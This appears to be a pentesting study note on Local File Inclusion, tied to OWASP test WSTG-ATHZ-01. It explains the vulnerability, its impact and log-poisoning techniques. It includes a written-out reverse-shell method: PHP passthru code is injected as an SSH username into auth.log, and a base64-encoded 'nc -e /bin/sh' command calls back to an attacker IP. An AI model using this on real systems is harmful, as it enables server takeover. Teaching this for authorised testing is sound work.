LFI attack - Local File Inclusion
OWASP
OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.1. Testing Directory Traversal File Include
ID | Link to Hackinglife | Link to OWASP | Description |
---|---|---|---|
5.1 | WSTG-ATHZ-01 | Testing Directory Traversal File Include | - Identify injection points that pertain to path traversal. - Assess bypassing techniques and identify the extent of path traversal (dot-dot-slash attack, Local/Remote file inclusion) |
Local File Inclusion (LFI) is a type of security vulnerability that occurs when an application allows an attacker to include files on the server through the web browser. File inclusion in web applications refers to the practice of including external files, often scripts or templates, into a web page dynamically. It is a fundamental concept used to create dynamic and modular web applications.
LFI vulnerabilities typically occur due to poor input validation or lack of proper security mechanisms in web applications. Attackers exploit these vulnerabilities by manipulating input parameters that are used to specify file paths or filenames within the application:
- File Inclusion Functions: Functions like include(), require(), or file_get_contents() that accept user-controlled input for file paths.
- HTTP Parameters: Input fields in web forms or query parameters in URLs.
- Cookies: If an application uses cookies to determine the file to include.
- Session Variables: If session data can be manipulated to control file inclusion.
Impact:
- Information Disclosure: Attackers can read sensitive files, including configuration files, user data, and source code, exposing critical information.
- Remote Code Execution: In some cases, LFI can lead to the execution of arbitrary code if an attacker can include malicious PHP or other script files.
- Directory Traversal: LFI attacks can allow an attacker to navigate the directory structure, potentially leading to further vulnerabilities or unauthorized access.
LFI (Local File Inclusion): The primary objective of an LFI attack is to include and display the contents of a file on the server within the context of a web application (to get it executed).
Directory Traversal: Directory Traversal, also known as Path Traversal, focuses on navigating the file system's directory structure to access files or directories outside the intended path. While this can lead to LFI, the primary goal is often broader, encompassing the ability to read, modify, or delete files and directories.
Interesting files
Interesting Windows files Interesting Linux files
/proc/self/environ
This files contain Environment variables. One of those variables might be HTTP_USER_AGENT, which is the user agent used by the client to access the server. So by using a proxy interceptor we could modify that header to be, let's say:
When it comes to get a shell here, we need to use PHP function passthru, which is similar to the exec command:
passthru — Execute an external program and display raw output
In this case, we would be adding in the user agent header the reverse shell:
/var/log/auth.log or /var/log/apache2/access.log
If we have the ability to read a log file, then we can see if we can write in them in a malicious way.
For instance, with /var/log/auth.log, we can try an ssh connection and see how these attemps are recorded on the file. Then, instead of using a real username, I can set some php code:
But there might be problems with blank spaces, slashes and so on, so one thing you can do is base64 encoded your netcat command, and tell the function to decode it before executing it
# base64 encode your netcat command: nc -e /bin/sh <attacker IP> <attacker port>
ssh "<?passthru(base64_decode'<base64 encoded text>');?>"@$ip
Now just get a netcat listener in your kali attacker machine.
Tools and payloads
- See updated chart: Attacks and tools for web pentesting.